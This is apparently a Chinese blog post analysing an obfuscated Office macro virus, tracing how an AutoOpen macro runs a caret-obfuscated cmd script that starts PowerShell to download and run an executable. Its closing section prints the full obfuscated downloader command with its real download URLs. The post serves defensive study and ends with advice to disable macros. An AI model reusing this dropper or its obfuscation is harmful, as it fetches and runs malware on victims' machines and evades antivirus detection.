各種代碼混淆Office宏病毒的示例分析

這篇文章將為大家詳細(xì)講解有關(guān)各種代碼混淆Office宏病毒的示例分析，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

前言

一些宏病毒為了躲過(guò)某些殺軟靜態(tài)檢測(cè)，采用一些混淆手段來(lái)使腳本更加不易檢測(cè)，通常做法是動(dòng)態(tài)混淆解密達(dá)到其目的。

分析

下面我們拿一個(gè)真實(shí)病毒的作法來(lái)分析一下，測(cè)試環(huán)境:Win7x64+Office2010,病毒樣例sample.doc（MD5: a564137f74ea2d65f8538faf89ef3897)，在VirusTotal查找可以發(fā)現(xiàn)已被絕大部分殺軟給檢測(cè)到了。

用Office打開(kāi)sample.doc提示需要開(kāi)啟宏的信息（實(shí)際上是一張圖片，以防用戶(hù)機(jī)器沒(méi)有開(kāi)啟宏，提示用戶(hù)去開(kāi)啟它來(lái)達(dá)到感染的目的）

打開(kāi)宏看到自動(dòng)啟動(dòng)AutoOpen()函數(shù)，VBA代碼基本上已混淆難以看懂

用F8單步調(diào)試一下定位到Shell調(diào)用外部命令位置

這里可以看出調(diào)用了CMD命令執(zhí)行了一段bat字符串腳本

這段代碼咋一看也是混淆過(guò)的，這個(gè)里面有一個(gè)”^”符號(hào)，實(shí)際上這只是障眼法，這個(gè)符號(hào)沒(méi)有實(shí)際意義，cmd在執(zhí)行過(guò)程中會(huì)忽略這個(gè)字符（在windows上測(cè)試cmd.exe打開(kāi)”c^a^l^c.^e^x^e”,可以打開(kāi)計(jì)算器calc.exe）,不過(guò)我在win10上拷貝這段腳本已被windows defender攔截了，說(shuō)明微軟已添加rule檢測(cè)這類(lèi)腳本，經(jīng)過(guò)整理后發(fā)現(xiàn)依然是一段難易看懂的代碼，有興趣可以自己去拆分一下腳本更容易看懂，這里我將直接運(yùn)行來(lái)看效果。

把這段腳本拷貝到cmd運(yùn)行會(huì)發(fā)現(xiàn)cmd啟動(dòng)了powershell.exe執(zhí)行一段code.

這段稍容易看懂，它償試從url下載一個(gè)exe文件到public目錄下，但發(fā)現(xiàn)大小為0下載失敗，這個(gè)url鏈接已經(jīng)無(wú)效了。（細(xì)心會(huì)發(fā)現(xiàn)它實(shí)際償試從5個(gè)url去下載exe文件），稍候該文件被自刪除。

由于這個(gè)樣例已被殺軟攔截，下載鏈接也已失效，所以沒(méi)法研究下載的exe做的事情，分享這篇文章是說(shuō)明 一下混淆代碼已是病毒常用手段了。Office是大家常用的辦公軟件，建議大家在使用Office的時(shí)候?qū)⒑臧踩O(shè)置禁用宏，不要輕易打開(kāi)未知來(lái)源的office文件。

文章中分析的腳本文本我列舉如下，以便有興趣的朋友去研究一下如何加解密bat腳本的。

CMd /V:^ON/C"^s^e^t r^k^w^b=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^  ^}^}^{^hc^tac^}^;^k^a^er^b^;n^t^I^$ ^m^et^I^-e^k^ovn^I^;)ntI^$^ ^,KC^G^$(e^l^iFda^o^lnw^o^D^.^A^t^z$^{^yr^t^{)^h^fr^$^ n^i^ ^KC^G^$(^hc^a^er^o^f^;^'^e^x^e.^'^+^YC^f^$^+^'^\^'^+c^i^l^b^up^:vne^$^=n^t^I^$^;^'^7^45^'^ ^=^ ^YC^f^$^;)^'^@^'(^t^i^l^p^S^.^'^I^3^B^k^S^S^h^6/^ur^.^5^5z^u^o^s^f^or^p//^:^p^t^t^h@^Gi^K^L^J^3^D^h^q^u/^gro^.c^e^dr^a^ka^d^ivav^iv//^:^p^t^t^h^@^f^H^T^P^O^i^7/^z^y^x^.^a^b^a^b^m^e^kr^o^g//^:^p^t^t^h^@^7^P^u^F^w^q^B^p^XV/^m^oc^.^k^p^k^a^s^p//^:p^t^t^h@^o^b2^qdn^B^p/^m^oc^.c^m^d^tc^a^p^moc//^:^p^t^t^h^'=^h^fr^$^;^tn^e^i^lC^b^e^W.^t^eN^ ^tc^e^j^bo^-^w^en^=^A^t^z^$^ ^l^l^e^hsr^ew^o^p&&^f^or /^L %^X ^in (^3^6^6^;^-^1;^0)^d^o ^s^e^t ^Sr^u^J=!^Sr^u^J!!r^k^w^b:~%^X,1!&&^i^f %^X=^=^0 c^a^l^l %^Sr^u^J:^~^6%"

關(guān)于各種代碼混淆Office宏病毒的示例分析就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到。